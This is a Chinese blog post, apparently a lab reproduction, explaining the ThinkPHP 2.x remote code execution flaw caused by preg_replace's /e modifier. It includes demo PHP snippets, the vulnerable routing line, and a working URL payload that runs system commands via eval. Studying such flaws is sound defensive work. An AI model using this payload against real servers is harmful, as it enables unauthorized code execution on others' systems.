ThinkPHP2-RCE漏洞复现

最新推荐文章于 2024-05-03 11:34:04 发布
最新推荐文章于 2024-05-03 11:34:04 发布
阅读量1.1k 收藏 3
点赞数
分类专栏: 渗透测试实验 文章标签: php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51459600/article/details/125179451
版权

ThinkPHP2-RCE漏洞复现

影响版本:PHP 5.2~5.6

/e 修 正符使 preg_replace() 将 replacement 参数当作 PHP 代码(在适当的逆向引用替换完之后)。提示:要确保 replacement 构成一个合法的 PHP 代码字符串,否则 PHP 会在报告在包含 preg_replace() 的行中出现语法解析错 误。

在ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:

$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));

导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。

例如:

<?php
$a = "abc";
$b = "aaaachummercaaaa";
echo preg_replace("/c(.+?)c/e",$a,$b);
?>;

输出:aaaaabcaaaa;

如果$a可控,如下:

<?php
$a = 'print_r("AAA");';
$b = "aaaac123caaaa";
echo preg_replace("/c(.+?)c/e",$a,$b);
?>;

输出如下:

由此可见,preg_replace()函数在匹配时,会自动执行replacement。

我们在对代码进行修改

<?php
function test($str){
    return "$str";
}
$a = "test('\1');";
$b = "aaaac${@print_r('AAA')}caaaa";
preg_replace("/c(.+?)c/e",$a,$b);
?>;

输出:

通过上图可以看到,如果$b可控,匹配到的字符串传递给了test函数,并将返回值给了$a,从而控制$a。这样就可以通过preg_replace()的/e修饰符执行可控参数了。

然而,/e修饰符在php版本为5.2~5.6时才可使用。

再回来看ThinkPHP2漏洞的出现点:

ThinkPHP/Lib/Think/Util/Dispatcher.class.php:102

$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));
            $_GET   =  array_merge($var,$_GET);

其中的$var为前面定义的一个数组。

将两个匹配到的字符串分别复制给$var的key和value,/e修饰符使其能够执行。

$paths定义如下:

它的功能是返回URL后面的参数

thinkphp路由的格式是分组/模块/操作名/参数

因此构造payload:

?s=/a/b/c/${@eval($_GET[1])}&1=system(%27whoami%27);

Hummer-200
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ThinkPHP5RCE漏洞复现
不想当脚本小子的脚本小子
06-10 938
又到了闲来无事的漏洞复现时间~~~ ThinkPHP RCE漏洞是由于变量覆盖而引起的,漏洞源于可以对thinkphp/library/think/Request.php文件中的method方法可以进行变量覆盖,通过覆盖类的核心属性filter导致RCE,其攻击点较为多,有些还具有限制条件,另外该漏洞在利用上会出现一些问题。 漏洞影响范围:<= 5.0.23、<= 5.1.32。 ...
漏洞通告ThinkPHP远程代码执行漏洞
05-05
漏洞通告】ThinkPHP远程代码执行漏洞
vulhub系列之thinkphp(2-rce、5.0.23-rce、5-rce、in-sqlinjection)
weixin_43071873的博客
11-24 1579
Thinkphp 2.x 任意代码执行 漏洞详情: ThinkPHP是一个免费开源用户数量非常多的一个PHP开发框架。ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由: KaTeX parse error: Undefined control sequence: \w at position 23: …reg_replace('@(\̲w̲+)'.depr.’([^’.KaTeX parse error: Undefined control sequence: \/ at po
thinkphp漏洞复现】2-RCE+5.0.23-RCE+5-RCE远程代码执行漏洞+in-sqlinjectionSQL注入漏洞
serendipity1130的博客
09-01 1512
参考文章:https://blog.csdn.net/weixin_43071873/article/details/110084577 一、2-RCE 漏洞详情: ThinkPHP是一个免费开源的一个PHP开发框架。ThinkPHP2.x版本中,使用preg_replace的/e模式匹配路由: 导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。 preg_replace(‘正则规则’,‘替换字符’,‘目标字符’) 如果目标字符存在符合正则规则的字符,那么就替换为替换字符,如果此时
ThinkPHP2--RCE漏洞复现
最新发布
m0_74402888的博客
05-03 1073
var['\1']="\2" 这里双引号引发函数执行,了解为什么${}会执行,在PHP当中,${}是可以构造一个变量的,{}写的是一般的字符,那么就会被当成变量,比如${a}等价于$a,那如果{}写的是一个已知函数名称呢?()值提取匹配的字符串,有几个括号就代表有几个匹配的字符串,看结果我们就知道,我们的目的是将键和值分别提取出来,所有有两个(),一个匹配键,一个匹配值。$a的执行语句执行了(注意如果要实现该代码需要修改php的版本为5.x的版本)s=a/a/a/${phpinfo()} 其中a随意。
漏洞复现】[ThinkPHP]2-Rce
Mr_atopos的博客
05-22 708
在BUU上复现 [ThinkPHP]2-Rce
thinkphp-2x-rce 代码执行[VULFOCUS]
m0_37638874的博客
09-08 855
ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。s=/模块/控制器/操作/[参数名/参数值…http://serverName/index.php(或者其他应用入口文件)/模块/控制器/操作/[参数名/参数值…在ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由。值提取匹配的字符串,有几个括号就代表有几个匹配的字符串,看结果我们就知道,我们的目的是将。
thinkphp 2-rce
weixin_51692662的博客
11-01 496
thinkphp 2-rce
ThinkPHP3.2.x RCE漏洞通报1
08-03
ThinkPHP3.2.x RCE漏洞通报】中提到的安全问题涉及到ThinkPHP 3.2版本的一个严重远程代码执行漏洞。这个漏洞源于框架中的`assign`方法,该方法用于将变量传递给模板进行渲染。当攻击者能够控制`assign`方法的第一...
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
08-03
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析 ThinkPHP 是一个流行的 PHP 框架,它提供了许多实用的功能来帮助开发者快速构建 Web 应用程序。然而,在 ThinkPHP 5.0.0 到 5.0.23 版本中存在一个 Remote Code Execution(RCE...
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
08-03
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
thinkphp 远程代码执行漏洞poc
12-11
漏洞影响范围:v5.x , 可以利用poc直接检测目标网站是否存在漏洞
thinkphp-bjyblog 开源博客系统 v1.1
10-11
thinkphp-bjyblog 开源博客系统 v1.1》是一个基于ThinkPHP框架构建的个人博客系统,专为开发者和学习者设计。这个开源项目旨在帮助用户建立自己的知识整理平台,同时也为初学者提供了一个深入理解ThinkPHP框架的...
thinkphp6-excel_thinkphp_
10-01
标题 "thinkphp6-excel_thinkphp_" 暗示我们正在处理一个使用ThinkPHP6框架的项目,其中包含了与处理Excel文件相关的功能。描述提到"thinkphp Excel 插件请自行安装",这意味着这个项目可能依赖于一个特定的ThinkPHP...
ThinkPhp6-demo:ThinkPhp6-Auth
02-10
ThinkPHP 6.0运行环境要求PHP7.1 +,兼容PHP8.0。| ThinkPHPV6.0版本由独家赞助...版权信息ThinkPHP遵循Apache2开放式协议发布,并提供免费使用。本项目包含的第三方二进制和二进制文件之版权信息补充标注。版权所有版
ThinkPHP 2.x 任意代码执行漏洞复现
qq_51283052的博客
04-19 794
首先了解这个preg_replace()函数:执行一个正则表达式的搜索和替换。简单来说可以这么理解preg_replace('正则规则','替换字符','目标字符')若目标字符存在符合正则规则的字符,那么就替换为替换字符,如果此时正则规则中使用了/e这个修饰符,则存在代码执行漏洞。e 配合函数preg_replace()使用, 可以把匹配来的字符串当作正则表达式执行;/e 可执行模式,此为PHP专有参数,例如preg_replace函数。
thinkphp 2 - rce漏洞复现
2301_76467680的博客
06-28 170
打开页面成功说明存在漏洞。利用eval函数进行绕过。
PHPER应注意的安全漏洞
大春博客
09-02 1018
     WEB应用程序漏洞查找基本上是围绕两个元素展开:变量与函数。也就是说一漏洞的利用必须把你提交的恶意代码通过变量经过n次变量转换传递,最终传递给目标函数执行,还记得MS那句经典的名言吗?“一切输入都是有害的”。这句话只强调了变量输入,很多程序员把“输入”理解为只是gpc[$_GET,$_POST,$_COOKIE],但是变量在传递过程产生了n多的变化。导致很多过滤只是个“纸老虎
thinkphp2-rce
07-28
ThinkPHP 2.x版本中存在远程代码执行(RCE漏洞。该漏洞可以通过构造恶意的请求来执行任意的PHP代码。具体来说,漏洞出现在ThinkPHP框架中的路由处理函数中,使用了不安全的preg_replace函数,并且使用了/e模式进行正则表达式匹配。攻击者可以通过在请求中注入恶意的代码来执行任意的PHP代码。这个漏洞ThinkPHP框架的Dispatcher类中的102行被触发。\[2\]\[3\] 为了修复这个漏洞,建议升级到最新版本的ThinkPHP框架,或者手动修复代码中的漏洞。具体修复方法包括使用更安全的正则表达式替代preg_replace函数,并且避免使用/e模式进行正则表达式匹配。此外,还应该对用户输入进行严格的过滤和验证,以防止恶意代码的注入。 #### 引用[.reference_title] - *1* [【漏洞复现】[ThinkPHP]2-Rce](https://blog.csdn.net/Mr_atopos/article/details/124907676)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [ThinkPHP2-RCE漏洞复现](https://blog.csdn.net/qq_51459600/article/details/125179451)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值